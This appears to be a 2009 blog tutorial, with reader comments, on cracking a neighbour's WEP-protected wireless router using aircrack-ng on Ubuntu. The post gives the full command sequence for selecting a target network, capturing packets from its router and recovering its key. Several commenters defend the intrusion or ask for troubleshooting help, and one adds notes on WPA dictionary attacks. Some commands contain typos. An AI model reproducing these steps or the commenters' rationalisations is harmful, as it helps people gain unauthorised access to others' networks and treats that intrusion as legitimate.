How to Crack / Hack your Neighbour Wireless Router using Ubuntu 9.10
First we need to install the necessary Ubuntu packages. This can be done with the Synaptic Package Manager (search for aircrack-ng and kismet) or using the Terminal.
$sudo apt-get install aircrack-ng
$sudo apt-get install kismet
Let's start by testing the wireless card:
$sudo airmon-ng stop ath0
$sudo airmon-ng start wifi0
Let's see all available wireless networks. Let's choose a wireless network with a good signal quality and with clients connected to it. Keep in mind the channel id (i.e. 6 or 11) and the router Mac Address.
$sudo airodump-ng mon0
Next step is to intercept data/packages we will need a bunch of IV's logged so we can decrypt the password later. Usually 250k or 500k are enough, sometimes the aircrack after failing deciphering the password will ask for 5.000 to 10.000 IV's. Let's start logging using the following command (6 stands for channel id and 00:MA:CA:DD:RE:SS for the router mac address.
sudo airdump-ng -c 6 --bssid 00:MA:CA:DD:RE:SS -w dump mon0
The final step, run this command to decipher the password.
$sudo aircrack-ng -a 1 -f 10 dump*.cap
The result shoud be:
KEY FOUND! **:**:**:**:** ASCII: ******
Decrypted correctly: 100%
If you get:
Failed. Next try with 5.000 IV's or .... Failed. Next try with 10.000
Then just collect more packages with $sudo airdump-ng -c 6 --bssid 00:MA:CA:DD:RE:SS -w dump mon0
- Comments
-
|15.195.201.xxx |2009-11-10 12:50:37 nick - do you need a special driver for monitor mode?Is the normal linux driver enough to get the card in monitor mode? cause with windows commview, you need a custom driver.
-
No special driver is needed in linux.
that is if your wireless card was properly detected and installed by your distro, then you are safe to go
-
|137.205.147.xxx |2009-11-10 14:38:35 Dawn_frenchIs this for cracking both WEP and WPA or just WEP?
-
|195.241.252.xxx |2009-11-10 14:16:39 Regnis - sorry for interruptingSorry for interrupting but you got to have more than only a driver and aircrack/kismet. You have to have a Chipset that supports Moniter mode.
And this tutorial is based on a WEP security Wirelss router. I would say those things are kind of important to put it in your tutorial.
-
only the chipset driver provided by the distro and aircrack-ng, kismet is not really necessary.
Agree, the tutorial is based on WEP = 90% of cases... for WAP you will need 2 extra lines
-
I think that cracking 3rd parities' wireless networks without their awareness and permission, is a completely unethical intrusion. I think such unethical or illegal uses of linux should not be promoted to users as they can only harm linux and opensource and help those how want to categorize it as an underground, cracker oriented and illegal software that sould not be used by legimate people. The tools described above are provided by ubuntu for use by network administratorsin or students for testing or studying network security of networks they have the legal right to access and administer. Any type of usage that can be considered illegal or unethical is highly discouraged, and ubuntu or the developers of the tools have no responsibility for such usage by other people.
-
I see your point but disagree 100%
» To begin the software is not illegal and can be downloaded from repositories.
» If there is anyone to blame you should point your finger at the Internet Service Providers... they are the ones that charge costumers with outrageous internet fees or download limits and supply very low grade equipment.
» If you use wireless than you are in trouble to start with, follow my example and turn off the wireless in your router. Right now, and like bluetooth, the technology is just unsafe and should not be use in any professional deployment without serious thought.
» To deploy the technology in a safer manner you will need a better gateway or router where you can actually assign a different ip range to wireless clients, mac address restrictions, dhcp / dns restrictions and the most important... good bandwidth and content restrictions
-
Admin wrote:I see your point but disagree 100%
» To begin the software is not illegal and can be downloaded from repositories.
I never implied that the software is illegal. The proposed use is illegal and sould not be promoted. It is like writting an article with title: "How to use a knife to open your neighboor's door". The ownership of a knife is not illegal... But breaking in your neighboor's house is.
Admin wrote:
» If there is anyone to blame you should point your finger at the Internet Service Providers... they are the ones that charge costumers with outrageous internet fees or download limits and supply very low grade equipment.
I agree, but that does not make wifi cracking less unethical or more legal to me...
Admin wrote:
» If you use wireless than you are in trouble to start with, follow my example and turn off the wireless in your router. Right now, and like bluetooth, the technology is just unsafe and should not be use in any professional deployment without s...
-
|207.96.196.xxx |2009-11-10 15:12:30 neken
I see you point but disagree 100%
>> To begin the hardware is not illegal and can be bought in a home depot (lockpick kit).
>> If there is anyone to blame you should point your finger at the builders of the homes... they are the ones that charge customers with outrageous fees and supply very low grade locking equipment.
>> If you use a door with a lock than you are in trouble to start with, follow my example and buy a security system with motion detectors, etc. Right now, the technology is just unsage and should not be used in any profesionnal deployment without serious thought.
this means i can go lockpick this guy's door and steal all his stuff right ????
what good reasonning ....
-
lol yes...if you buy a cheap door that's what will probably happen. Welcome to the real world.
now all your conclusions are wrong... hacking, cracking means exploitation of unsecure systems, detecting faults and improve security... and should be seem as so.
If this is not done how will we ever know if systems or techs are safe
This is a weapon, "guns don't kill people... chuck norris does"
Again... I never said it was to steal or borrow. It's just unfortunatly very easy. Why aren't ISP doing something about this...or at least informing users of it's dangers.
But again... if you want to put your head under the sand... it's your problem... meanwhile...please turn off your wireless and don't blame the messenger.
-
|201.159.193.xxx |2009-11-10 18:39:03 Saverio - Not illegal, not unethicalI don't think there is anything unethical in receiving a radio signal: the airwaves (ether) are FREE, for the whole human race, and have been regulated by an international body for nearly a century. And ever since, it has been established that any equipment receiving any EM interference must accept it. You see a similar disclaimer on most electronic goods (including VCRs, TV sets, cordless or mobile phones, DVD players, Hi-Fi equipment and ... computers.
A real life example is CCTV: let's say your neighbor has CCTV in his house and you have a regular TV set with an old fashion TV antenna (UHF/VHF). Chances are you'll be able to receive some of the signal from your neighbor's system within the VHF range. And is perfectly legal. The only thing your neighbor can do is to scramble and/or change the frequency (channel) on the system. Same thing with cordless phones. Same thing with Wi-Fi.
Thus I think that the Wi-Fi business model as a whole is the problem here, where a radio (MW) freq...
-
|70.1.235.xxx |2009-11-11 14:17:39 yonnie - thank youLove your article. You do use some undefined acronyms, but overall it's nice to know and see how instead of the usual it can be done stuff.
As far as the ethics stuff? Stuff it! This is learning to use tools. Tools that are required to check and test your network and tools that can aid in testing other networks.
How would you like it if you had to have a license to buy a wrench? How would you learn to use wrenches? Fix your own car?
-
|70.123.89.xxx |2009-11-11 11:39:39 X - hmmmWell, all this righteous stuff is bull!! If you have the ability to crack/hack other networks, then go ahead. The initial posting is an exercise of the first amendment of the US Constitution!! So if there is a protest of the initial posting on this page, then who ever is against hacking/cracking neighbors network, does not know the true spirit of the enthusiast. Hackers were the ones who created the internet. I highly advise that the user, ktogias, read up on the history of the internet and think twice before bringing that moral crap into this. Although I understand the opinion of ktogias, I highly disagree 1000000%. So ktogias, if you read this, go back and read up on what real computer hackers do and stop putting the killjoy on the excitement of this article.
-
|115.132.134.xxx |2009-11-11 15:48:27 lawl - Cant stop runningAfter typing in
$sudo airodump-ng mon0
it did not stop running. does it take longer than 2 hours?
-
No it takes a few seconds...
try
$sudo airmon-ng start wlan0
or the correspondent interface name of the wireless card... you can check it doing $sudo ifconfig
-
|115.132.134.xxx |2009-11-12 00:33:51 lawl - RetryI retried. And it only show,
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
924 avahi-daemon
925 avahi-daemon
1135 NetworkManager
1277 wpa_supplicant
1279 dhclient
Process with PID 21353 (airodump-ng) is running on interface mon0
Process with PID 21361 (airodump-ng) is running on interface mon0
Process with PID 23950 (airodump-ng) is running on interface mon2
Process with PID 23958 (airodump-ng) is running on interface mon2
Interface Chipset Driver
wlan0 Intel 4965/5xxx iwlagn - [phy0]
(monitor mode enabled on mon4)
mon0 Intel 4965/5xxx iwlagn - [phy0]
mon1 Intel 4965/5xxx iwlagn - [phy0]
mon2 Intel 4965/5xxx iwlagn - [phy0]
mon3 Intel 4965/5xxx iwlagn - [phy0]
THen when i hit in $sudo airodump-ng mon4, it will scan for hours, i just left it running for 9 hours, and it goes on and on.
-
|118.100.128.xxx |2009-11-15 17:37:56 noobWhen type in "sudo airodump-ng mon0",it prompt out "ioctl(SIOCGIFINDEX) failed: No such device" anything wrong?
-
$sudo airmon-ng start wlan0
or the correspondent interface name of the wireless card... you can check it doing $sudo ifconfig
once you have started correctly your wifi device you can
$sudo airodump-ng mon0
-
|190.2.194.xxx |2010-04-21 01:48:52 Rholand - Still not wirking for me...... :(rholand@rholand:~$ sudo airmon-ng start wlan0
Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
931 NetworkManager
932 avahi-daemon
933 avahi-daemon
1103 wpa_supplicant
Interface Chipset Driver
ra0 Ralink 2560 PCI rt2500
rholand@rholand:~$ sudo airodump-ng mon0
Interface mon0:
ioctl(SIOCGIFINDEX) failed: No such device
Do i have to patch the wifi driver or something? Thanx for your time!
-
|80.194.6.xxx |2010-01-12 05:47:14 blackbeard - "How to use a knife to open your neighboor's doIf the door is in my house ,I will open it
)
-
Hello, its more then drivers, you need a card that will do packet injection. if you dont have it you will get nothing done that you want to do. WEP will crack in under 1 minute. WPA is little longer but you will need good dict or some good pre-salted keys. also saw something about illegal , nothing about Pentesting is illegal just when you hack stuff thats not yours.
Powered by www.pmabox.com v2.2
